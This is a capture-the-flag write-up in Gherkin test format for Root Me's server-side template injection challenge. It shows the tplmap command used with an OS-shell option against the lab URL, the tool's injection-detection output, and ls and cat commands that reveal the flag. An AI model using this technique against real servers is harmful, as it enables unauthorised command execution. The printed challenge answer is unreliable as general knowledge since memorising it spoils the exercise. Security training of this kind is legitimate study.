## Version 2.0
## language: en

Feature: Web server-Root Me
  Site:
    www.root-me.org
  Category:
    Web server
  User:
    ciberstein
  Goal:
    Find the validation password in the file SECRET_FLAG.txt.

  Background:
  Hacker's software:
    | <Software name> |    <Version>     |
    | Windows         | 10.0.17134 (x64) |
    | Chrome          | 70.0.3538.77     |
    | Python          | 2.7              |
  Machine information:
    Given I am accessing the challenge site from my browser
    And the statement is displayed
    """
    Server-side Template Injection

    Exploit the vulnerability in order to retrieve the
    validation password in the file SECRET_FLAG.txt.
    """
    And the website of redirection is
    """
    http://challenge01.root-me.org/web-serveur/ch41/
    """

  Scenario: Fail:Use the source code view
    Given the form on the website proceed to see the source code
    Then I analyze the code in search of a link to the file
    And I can not get anything out of the ordinary
    And I conclude that the file is hidden by another method.

  Scenario: Success:Use the automatic attack script
    Given I found a website with the automatic script
    """
    https://github.com/epinna/tplmap
    """
    And I clone the repository in my local drive
    Then I excecute the windows command prompt in the repository
    Then I run the command specificated by the autor of the script
    """
    python tplmap.py -u http://challenge01.root-me.org/web-serveur/ch41/check
    -d "nickname=john" --os-shell
    """
    And I receive the information [evidence](evidence1.png)
    """
    [+] Tplmap 0.5
      Automatic Server-Side Template Injection Detection and Exploitation Tool

    [+] Testing if POST parameter 'nickname' is injectable
    [+] Smarty plugin is testing rendering with tag '*'
    [+] Smarty plugin is testing blind injection
    [+] Mako plugin is testing rendering with tag '${*}'
    [+] Mako plugin is testing blind injection
    [+] Python plugin is testing rendering with tag 'str(*)'
    [+] Python plugin is testing blind injection
    [+] Tornado plugin is testing rendering with tag '{{*}}'
    [+] Tornado plugin is testing blind injection
    [+] Jinja2 plugin is testing rendering with tag '{{*}}'
    [+] Jinja2 plugin is testing blind injection
    [+] Twig plugin is testing rendering with tag '{{*}}'
    [+] Twig plugin is testing blind injection
    [+] Freemarker plugin is testing rendering with tag '*'
    [+] Freemarker plugin has confirmed injection with tag '*'
    [+] Tplmap identified the following injection point:

      POST parameter: nickname
      Engine: Freemarker
      Injection: *
      Context: text
      OS: Linux
      Technique: render
      Capabilities:

        Shell command execution: ok
        Bind and reverse shell: ok
        File write: ok
        File read: ok
        Code evaluation: no

    [+] Run commands on the operating system.
    """
    Then I saw that open a linux console
    And I proceeded at run the following command [evidence](evidence2.png)
    """
    $ls
    """
    And I receive this information
    """
    pom.xml
    SECRET_FLAG.txt
    src
    target
    webapp
    """
    Then I proceed to see the contents of the txt file
    """
    $ cat SECRET_FLAG.txt
    """
    Then I saw the flag
    """
    B3wareOfT3mplat3Inj3ction
    """
    Then I put as answer B3wareOfT3mplat3Inj3ction and the answer is correct.
    Then I solved the challenge.
